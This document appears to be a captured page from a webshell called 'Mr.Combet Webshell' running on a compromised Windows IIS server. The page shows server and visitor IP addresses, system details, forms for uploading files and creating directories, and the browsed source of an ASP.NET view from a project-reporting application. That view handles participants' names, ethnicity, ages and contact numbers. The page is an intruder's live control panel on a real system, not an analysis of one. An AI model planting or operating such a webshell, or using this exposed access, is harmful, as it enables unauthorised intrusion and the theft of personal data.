Mr.Combet Webshell
Your IP :
216.73.216.136
Server IP :
103.233.58.157
Server :
Windows NT WIN-4PGF72KEHKB 10.0 build 17763 (Windows Server 2016) AMD64
Server Software :
Microsoft-IIS/10.0
PHP Version :
7.3.25
Add File :
Submit
Add Directory :
Submit
Dir :
C:
/
inetpub
/
wwwroot
/
map
/
Views
/
ActivityReporting
/
View File Name :
Details1.cshtml
@model RER_Project.DataAccess.ViewModels.Activity.ActivityReportingViewModel <div class="row wrapper border-bottom white-bg page-heading"> <div class="col-md-8"> <ol class="breadcrumb"> <li class="active"> <strong>Activity/Event Details</strong> </li> </ol> </div> </div> <div class="wrapper wrapper-content animated fadeInRight"> <div class="row"> <div class="col-lg-12"> <div class="ibox-content"> <div class="row "> <div class="col-md-2" style="width: 120px;"> <strong>Fiscal Year:</strong> </div> <div class="col-md-10"> @Model.ActivityReportingView.FiscalYear </div> </div> <div class="row "> <div class="col-md-2" style="width: 120px;"> <strong>Activity Name:</strong> </div> <div class="col-md-4"> @Model.ActivityReportingView.ActivityName </div> </div> <div class="row"> <div class="col-md-2" style="width: 120px;"> <strong>Start Date:</strong> </div> <div class="col-md-4"> @Convert.ToDateTime(Model.ActivityReportingView.StartDate).ToShortDateString() </div> <div class="col-md-2" style="width: 120px;"> <strong>End Date:</strong> </div> <div class="col-md-4"> @Convert.ToDateTime(Model.ActivityReportingView.EndDate).ToShortDateString() </div> </div> <div class="row"> <div class="col-md-2" style="width: 120px;"> <strong>Commodity:</strong> </div> <div class="col-md-4"> @Model.ActivityReportingView.Commodity </div> </div> <div class="row"> <div class="col-md-2" style="width: 120px;"> <strong>Planned Budget:</strong> </div> <div class="col-md-4"> @Model.ActivityReportingView.PlannedBudget </div> <div class="col-md-2" style="width: 120px;"> <strong>Actual Expense:</strong> </div> <div class="col-md-4"> @Model.ActivityReportingView.ActualExpense </div> </div> <div class="row"> <div class="col-md-2" style="width: 120px;"> <strong>Province:</strong> </div> <div class="col-md-4"> @Model.ActivityReportingView.Province </div> <div class="col-md-2" style="width: 120px;"> <strong>District:</strong> </div> <div class="col-md-4"> @Model.ActivityReportingView.District </div> </div> <div class="row"> <div class="col-md-2" style="width: 120px;"> <strong>Municipality:</strong> </div> <div class="col-md-4"> @Model.ActivityReportingView.Municipality </div> <div class="col-md-2" style="width: 120px;"> <strong>InCoordinationOf:</strong> </div> <div class="col-md-4"> @Model.ActivityReportingView.InCoordinationOf </div> </div> <div class="row"> <div class="col-md-2" style="width: 120px;"> <strong>Facilitator:</strong> </div> <div class="col-md-4"> @Model.ActivityReportingView.Facilitator </div> <div class="col-md-2" style="width: 120px;"> <strong>Objectives:</strong> </div> <div class="col-md-4"> @Model.ActivityReportingView.Objectives </div> </div> <div class="row"> <div class="col-md-2" style="width: 120px;"> <strong>DetailsOfActivity:</strong> </div> <div class="col-md-4"> @Model.ActivityReportingView.DetailsOfActivity </div> <div class="col-md-2" style="width: 120px;"> <strong>Output:</strong> </div> <div class="col-md-4"> @Model.ActivityReportingView.Output </div> </div> <div class="row"> <div class="col-md-2" style="width: 120px;"> <strong>IssuesIdentified:</strong> </div> <div class="col-md-4"> @Model.ActivityReportingView.IssuesIdentified </div> <div class="col-md-2" style="width: 120px;"> <strong>Recommendation:</strong> </div> <div class="col-md-4"> @Model.ActivityReportingView.Recommendation </div> </div> <br /><br /> <div class="table-responsive" style="margin-top: 16px;"> <h4 style="background-color: #e9e9e9; padding: 8px 8px;">Activity Participants</h4> <h5>Member Participants</h5> <table class="footable table table-hover"> <thead> <tr> <th>Group</th> <th>Member Name </th> <th>Age</th> <th>Ethnicity</th> <th>Gender</th> <th>Contact</th> </tr> </thead> <tbody> @if (Model.ActivityParticipantViewList.Count() > 0) { foreach (var item in Model.ActivityParticipantViewList) { <tr> <td>@item.GroupName</td> <td>@String.Concat(item.FirstName, ' ', item.LastName)</td> <td>@item.Age</td> <td>@item.Ethnicity</td> <td>@item.Gender</td> <td>@item.ContactNo</td> </tr> } } else { <tr> <td align="center" colspan="7">No Records Found</td> </tr> } </tbody> @*<tfoot> <tr> <th colspan="5" style="text-align: right"> Total: @Model.ActivityParticipantViewList.Count() </th> </tr> </tfoot>*@ </table> <h5>Other Participants</h5> <table class="footable table table-hover"> <thead> <tr> <th>Member Name</th> <th>Ethnicity</th> <th>Age</th> <th>Gender</th> <th>Contact No</th> <th>Origin</th> </tr> </thead> <tbody> @if (Model.ActivityParticipantViewList.Count() > 0) { foreach (var item in Model.ActivityParticipantViewList.Where(x => x.MemberId == 0)) { <tr> <td>@item.MemberName</td> <td>@item.Ethnicity</td> <td>@item.Age</td> <td>@item.Gender</td> <td>@item.ContactNo</td> <td>@item.Origin</td> </tr> } } else { <tr> <td align="center" colspan="7">No Records Found</td> </tr> } </tbody> </table> </div> <div class="table-responsive" style="margin-top: 16px;"> <h4 style="background-color: #e9e9e9; padding: 8px 8px;">Member Participants Details(Disaggregated Data)</h4> <table class="footable table table-bordered table-hover"> <thead> <tr> <th style="text-align:center">Total Participants</th> <th colspan="4" style="text-align:center">Dalit</th> <th colspan="4" style="text-align:center">Janajati</th> <th colspan="4" style="text-align:center">Others</th> <th colspan="4" style="text-align:center">Madhesi Eco Class2</th> <th colspan="4" style="text-align:center">Muslim</th> <th colspan="2" style="text-align:center">Total</th> </tr> <tr> <th></th> <th colspan="2" style="text-align:center">Hill</th> <th colspan="2" style="text-align:center">Terai</th> <th colspan="2" style="text-align:center">Hill</th> <th colspan="2" style="text-align:center">Terai</th> <th colspan="2" style="text-align:center">Hill</th> <th colspan="2" style="text-align:center">Terai</th> <th colspan="2" style="text-align:center">Hill</th> <th colspan="2" style="text-align:center">Terai</th> <th colspan="2" style="text-align:center">Hill</th> <th colspan="2" style="text-align:center">Terai</th> <th colspan="2" style="text-align:center"></th> </tr> <tr> <th></th> <th rowspan="2" style="text-align:center">Male</th> <th rowspan="2" style="text-align:center">Female</th> <th rowspan="2" style="text-align:center">Male</th> <th rowspan="2" style="text-align:center">Female</th> <th rowspan="2" style="text-align:center">Male</th> <th rowspan="2" style="text-align:center">Female</th> <th rowspan="2" style="text-align:center">Male</th> <th rowspan="2" style="text-align:center">Female</th> <th rowspan="2" style="text-align:center">Male</th> <th rowspan="2" style="text-align:center">Female</th> <th rowspan="2" style="text-align:center">Male</th> <th rowspan="2" style="text-align:center">Female</th> <th rowspan="2" style="text-align:center">Male</th> <th rowspan="2" style="text-align:center">Female</th> <th rowspan="2" style="text-align:center">Male</th> <th rowspan="2" style="text-align:center">Female</th> <th rowspan="2" style="text-align:center">Male</th> <th rowspan="2" style="text-align:center">Female</th> <th rowspan="2" style="text-align:center">Male</th> <th rowspan="2" style="text-align:center">Female</th> <th rowspan="2" style="text-align:center">Male</th> <th rowspan="2" style="text-align:center">Female</th> </tr> </thead> <tbody> @if (Model.ActivityParticipantDetailViewList.Count() > 0) { foreach (var item in Model.ActivityParticipantDetailViewList) { <tr> <td>@item.MigrationStatus</td> <td>@item.HillDalitMale</td> <td>@item.HillDalitFemale</td> <td>@item.TeraiDalitMale</td> <td>@item.TeraiDalitFemale</td> <td>@item.HillJanjatiMale</td> <td>@item.HillJanjatiFemale</td> <td>@item.TeraiJanjatiMale</td> <td>@item.TeraiJanjatiFemale</td> <td>@item.HillOthersMale</td> <td>@item.HillOthersFemale</td> <td>@item.TeraiOthersMale</td> <td>@item.TeraiOthersFemale</td> <td>@item.HillMadhesMale</td> <td>@item.HillMadhesFemale</td> <td>@item.TeraiMadhesMale</td> <td>@item.TeraiMadhesFemale</td> <td>@item.HillMuslimMale</td> <td>@item.HillMuslimFemale</td> <td>@item.TeraiMuslimMale</td> <td>@item.TeraiMuslimFemale</td> <td>@item.TotalMale</td> <td>@item.TotalFemale</td> </tr> } } else { <tr> <td align="center" colspan="7">No Records Found</td> </tr> } </tbody> </table> </div> <div class="row"> <div class="pull-right"> <a href="/activityreporting/reporting" class="btn btn-default btn-sm">Back</a> </div> </div> </div> </div> </div> </div>